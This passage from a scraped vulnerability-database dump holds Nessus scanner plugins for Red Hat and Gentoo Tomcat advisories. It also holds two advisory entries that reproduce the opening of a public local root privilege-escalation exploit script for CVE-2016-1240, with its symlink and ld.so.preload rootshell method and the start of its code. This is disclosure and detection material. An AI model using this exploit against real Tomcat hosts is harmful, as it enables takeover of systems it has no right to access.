value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-c3p0-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-core-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-entitymanager-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-envers-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apache-commons-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apache-commons-daemon-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apache-commons-daemon-jsvc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-native-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-vault\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-lib\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:0455\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-c3p0-eap6-4.2.23-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-core-eap6-4.2.23-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-eap6-4.2.23-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-entitymanager-eap6-4.2.23-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-envers-eap6-4.2.23-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbcs-httpd24-apache-commons-daemon-1.0.15-1.redhat_2.1.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-apache-commons-daemon-jsvc-1.0.15-17.redhat_2.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-apache-commons-daemon-jsvc-1.0.15-17.redhat_2.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", 
reference:\"jbcs-httpd24-apache-commons-daemon-jsvc-debuginfo-1.0.15-17.redhat_2.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-apache-commons-daemon-jsvc-debuginfo-1.0.15-17.redhat_2.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbcs-httpd24-runtime-1-3.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-1.3.5-2.Final_redhat_2.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-tomcat7-1.3.5-2.Final_redhat_2.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-tomcat8-1.3.5-2.Final_redhat_2.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"tomcat-native-1.2.8-9.redhat_9.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"tomcat-native-1.2.8-9.redhat_9.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"tomcat-native-debuginfo-1.2.8-9.redhat_9.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"tomcat-native-debuginfo-1.2.8-9.redhat_9.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat-vault-1.0.8-9.Final_redhat_2.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-admin-webapps-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-docs-webapp-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-el-2.2-api-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-javadoc-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-jsp-2.2-api-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-jsvc-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-lib-7.0.70-16.ep7.el6\")) 
flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-log4j-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-selinux-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-servlet-3.0-api-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-webapps-7.0.70-16.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-admin-webapps-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-docs-webapp-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-el-2.2-api-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-javadoc-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-jsp-2.3-api-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-jsvc-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-lib-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-log4j-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-selinux-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-servlet-3.1-api-8.0.36-17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-webapps-8.0.36-17.ep7.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"hibernate4-c3p0-eap6 / hibernate4-core-eap6 / hibernate4-eap6 / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:40:54", 
"bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201705-09\n(Apache Tomcat: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Tomcat. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker may be able to cause a Denial of Service condition,\n obtain sensitive information, bypass protection mechanisms and\n authentication restrictions.\n A local attacker, who is a tomcat’s system user or belongs to\n tomcat’s group, could potentially escalate privileges.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2019-11-02T00:00:00", "id": "GENTOO_GLSA-201705-09.NASL", "href": "https://www.tenable.com/plugins/nessus/100262", "published": "2017-05-18T00:00:00", "title": "GLSA-201705-09 : Apache Tomcat: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201705-09.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100262);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/04/10 16:10:17\");\n\n script_cve_id(\"CVE-2015-5174\", \"CVE-2015-5345\", \"CVE-2015-5346\", \"CVE-2015-5351\", \"CVE-2016-0706\", \"CVE-2016-0714\", \"CVE-2016-0763\", \"CVE-2016-1240\", \"CVE-2016-3092\", \"CVE-2016-8745\", \"CVE-2017-5647\", \"CVE-2017-5648\", \"CVE-2017-5650\", \"CVE-2017-5651\");\n script_xref(name:\"GLSA\", value:\"201705-09\");\n\n script_name(english:\"GLSA-201705-09 : Apache Tomcat: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201705-09\n(Apache Tomcat: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Tomcat. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker may be able to cause a Denial of Service condition,\n obtain sensitive information, bypass protection mechanisms and\n authentication restrictions.\n A local attacker, who is a tomcat’s system user or belongs to\n tomcat’s group, could potentially escalate privileges.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201705-09\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Apache Tomcat users have to manually check their Tomcat runscripts\n to make sure that they don’t use an old, vulnerable runscript. 
In\n addition:\n All Apache Tomcat 7 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/tomcat-7.0.70:7'\n All Apache Tomcat 8 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/tomcat-8.0.36:8'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/tomcat\", unaffected:make_list(\"ge 8.0.36\", \"ge 7.0.70\"), vulnerable:make_list(\"lt 8.0.36\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache Tomcat\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "myhack58": [{"lastseen": "2016-10-29T18:03:04", "bulletinFamily": "info", "description": "Just before the National Day holiday, on 1 October, a local privilege escalation vulnerability in Tomcat, CVE-2016-1240, was disclosed. An attacker who holds nothing more than the low-privileged Tomcat user can use it to obtain root privileges on the system. The vulnerability is not difficult to exploit, so affected users should pay particular attention. \nTomcat is an application server from the Apache Software Foundation, a container for running Servlet/JSP applications. It can be deployed as an extension of the Apache HTTP Server, but it also runs independently of it. \nVulnerability ID: \nCVE-2016-1240 \nAffected range: \nTomcat 8 \nTomcat 7 \nTomcat 6 \nAffected systems include Debian and Ubuntu; other systems that use the corresponding deb packages may also be affected. \nFix: \nThe Debian security team has fixed the affected packages; update the system to the latest Tomcat packages it provides. \nVulnerability overview: \nAdministrators of Debian-based Linux systems typically use apt-get for package management. CVE-2016-1240 is a problem in the Tomcat deb packages: installing Tomcat from the deb package installs, as root, a startup script at /etc/init.d/tomcat*, and that script lets an attacker who holds only the low-privileged Tomcat user obtain root on the system! \n# Run the catalina.sh script as a daemon \nset +e \ntouch \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out \nchown $TOMCAT7_USER \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out \nA local attacker running as the tomcat user (for example after exploiting a web application vulnerability) replaces catalina.out with a symlink to any file on the system. Once the Tomcat init script, running as root, re-opens catalina.out after the service is restarted, the attacker obtains root privileges. \nVulnerability PoC: \n#!/bin/bash \n# \n# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit \n# \n# CVE-2016-1240 \n# \n# Discovered and coded by: \n# \n# Dawid Golunski \n# http://legalhackers.com \n# \n# This exploit targets the Tomcat (versions 6, 7 and 8) packaging on \n# Debian-based distros including Debian, Ubuntu etc. \n# It allows attackers with a tomcat shell (e.g. obtained remotely through a \n# vulnerable java webapp, or locally via weak permissions on webapps in the \n# Tomcat webroot directories etc.) to escalate their privileges to root. \n# \n# Usage: \n# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred] \n# \n# The exploit can be used in two ways: \n# \n# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly \n# gains/executes a rootshell via ld.so.preload as soon as the Tomcat service is restarted. \n# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up \n# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.) \n# \n# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to \n# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. \n# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a \n# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can \n# then add arbitrary commands to the file which will be executed with root privileges by \n# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default \n# Ubuntu/Debian Tomcat installations). \n# \n# See full advisory for details at: \n# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html \n# \n# Disclaimer: \n# For testing purposes only. Do no harm. \n# \nBACKDOORSH=\"/bin/bash\" \nBACKDOORPATH=\"/tmp/tomcatrootsh\" \nPRIVESCLIB=\"/tmp/privesclib.so\" \nPRIVESCSRC=\"/tmp/privesclib.c\" \nSUIDBIN=\"/usr/bin/sudo\" \nfunction cleanexit { \n# Cleanup \necho -e \"\\n[+] Cleaning up...\" \nrm -f $PRIVESCSRC \nrm -f $PRIVESCLIB \nrm -f $TOMCATLOG \ntouch $TOMCATLOG \nif [ -f /etc/ld.so.preload ]; then \necho -n > /etc/ld.so.preload 2>/dev/null \nfi \necho -e \"\\n[+] Job done. Exiting with code $1 \\n\" \nexit $1 \n} \nfunction ctrl_c() { \necho -e \"\\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\" \ncleanexit 0 \n} \n#intro \necho -e \"\\033[94m \\nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\\nCVE-2016-1240\\n\" \necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\" \n# Args \nif [ $# -lt 1 ]; then \necho -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_catalina.out [-deferred]\\n\" \nexit 3 \nfi \nif [ \"$2\" = \"-deferred\" ]; then \nmode=\"deferred\" \n\n\n**[1] [[2]](<79941_2.htm>) [[3]](<79941_3.htm>) [next](<79941_2.htm>)**\n", "modified": "2016-10-08T00:00:00", "published": "2016-10-08T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/79941.htm", "id": "MYHACK58:62201679941", "type": "myhack58", "title": "Vulnerability alert: Tomcat local privilege escalation vulnerability CVE-2016-1240, with PoC - Exploit Alert - Black Bar Security Net", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-09T13:30:40", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2016-10-01T00:00:00", "published": "2016-10-01T00:00:00", "id": "1337DAY-ID-25101", "href": "https://0day.today/exploit/description/25101", "type": "zdt", "title": "Apache Tomcat on Debian-Based Distros - Privilege Escalation Vulnerability", "sourceData": "=============================================\r\n- Discovered by: Dawid Golunski\r\n- http://legalhackers.com\r\n- dawid (at) legalhackers.com\r\n\r\n- CVE-2016-1240\r\n- Release date: 30.09.2016\r\n- Revision: 1\r\n- Severity: High\r\n=============================================\r\n\r\n\r\nI. 
VULNERABILITY\r\n-------------------------\r\n\r\nTomcat packaging on Debian-based distros - Local Root Privilege Escalation\r\n\r\nAffected debian packages:\r\n\r\nTomcat 8 <= 8.0.36-2\r\nTomcat 7 <= 7.0.70-2\r\nTomcat 6 <= 6.0.45+dfsg-1~deb8u1\r\n\r\nUbuntu systems are also affected. See section VII. for details.\r\nOther systems using the affected debian packages may also be affected.\r\n\r\n\r\nII. BACKGROUND\r\n-------------------------\r\n\r\n\"The Apache Tomcat\u00ae software is an open source implementation of the\r\nJava Servlet, JavaServer Pages, Java Expression Language and Java WebSocket\r\ntechnologies. The Java Servlet, JavaServer Pages, Java Expression Language\r\nand Java WebSocket specifications are developed under the Java Community\r\nProcess.\r\n\r\nThe Apache Tomcat software is developed in an open and participatory\r\nenvironment and released under the Apache License version 2.\r\nThe Apache Tomcat project is intended to be a collaboration of the\r\nbest-of-breed developers from around the world.\r\n\r\nApache Tomcat software powers numerous large-scale, mission-critical web\r\napplications across a diverse range of industries and organizations.\r\nSome of these users and their stories are listed on the PoweredBy wiki page.\r\n\"\r\n\r\nhttp://tomcat.apache.org/\r\n\r\n\r\nIII. INTRODUCTION\r\n-------------------------\r\n\r\nTomcat (6, 7, 8) packages provided by default repositories on Debian-based\r\ndistributions (including Debian, Ubuntu etc.) provide a vulnerable\r\ntomcat init script that allows local attackers who have already gained access\r\nto the tomcat account (for example, by exploiting an RCE vulnerability\r\nin a java web application hosted on Tomcat, uploading a webshell etc.) to\r\nescalate their privileges from tomcat user to root and fully compromise the\r\ntarget system.\r\n\r\nIV. 
DESCRIPTION\r\n-------------------------\r\n\r\nThe vulnerability is located in the tomcat init script provided by affected\r\npackages, normally installed at /etc/init.d/tomcatN.\r\n\r\nThe script for tomcat7 contains the following lines:\r\n\r\n-----[tomcat7]----\r\n\r\n# Run the catalina.sh script as a daemon\r\nset +e\r\ntouch \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out\r\nchown $TOMCAT7_USER \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out\r\n\r\n-------[eof]------\r\n\r\nLocal attackers who have gained access to the server in the context of the\r\ntomcat user (for example, through a vulnerability in a web application) would\r\nbe able to replace the log file with a symlink to an arbitrary system file\r\nand escalate their privileges to root once Tomcat init script (running as root)\r\nre-opens the catalina.out file after a service restart, reboot etc.\r\n\r\nAs attackers would already have a tomcat account at the time of exploitation,\r\nthey could also kill the tomcat processes to introduce the need for a restart.\r\n\r\n\r\nV. PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n\r\n------[ tomcat-rootprivesc-deb.sh ]------\r\n\r\n#!/bin/bash\r\n#\r\n# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\r\n#\r\n# CVE-2016-1240\r\n#\r\n# Discovered and coded by:\r\n#\r\n# Dawid Golunski\r\n# http://legalhackers.com\r\n#\r\n# This exploit targets Tomcat (versions 6, 7 and 8) packaging on\r\n# Debian-based distros including Debian, Ubuntu etc.\r\n# It allows attackers with a tomcat shell (e.g. obtained remotely through a\r\n# vulnerable java webapp, or locally via weak permissions on webapps in the\r\n# Tomcat webroot directories etc.) 
to escalate their privileges to root.\r\n#\r\n# Usage:\r\n# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]\r\n#\r\n# The exploit can be used in two ways:\r\n#\r\n# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly\r\n# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted.\r\n# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up\r\n# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)\r\n#\r\n# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to\r\n# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting.\r\n# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a\r\n# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can\r\n# then add arbitrary commands to the file which will be executed with root privileges by\r\n# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default\r\n# Ubuntu/Debian Tomcat installations).\r\n#\r\n# See full advisory for details at:\r\n# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html\r\n#\r\n# Disclaimer:\r\n# For testing purposes only. Do no harm.\r\n#\r\n\r\nBACKDOORSH=\"/bin/bash\"\r\nBACKDOORPATH=\"/tmp/tomcatrootsh\"\r\nPRIVESCLIB=\"/tmp/privesclib.so\"\r\nPRIVESCSRC=\"/tmp/privesclib.c\"\r\nSUIDBIN=\"/usr/bin/sudo\"\r\n\r\nfunction cleanexit {\r\n# Cleanup\r\necho -e \"\\n[+] Cleaning up...\"\r\nrm -f $PRIVESCSRC\r\nrm -f $PRIVESCLIB\r\nrm -f $TOMCATLOG\r\ntouch $TOMCATLOG\r\nif [ -f /etc/ld.so.preload ]; then\r\necho -n > /etc/ld.so.preload 2>/dev/null\r\nfi\r\necho -e \"\\n[+] Job done. Exiting with code $1 \\n\"\r\nexit $1\r\n}\r\n\r\nfunction ctrl_c() {\r\necho -e 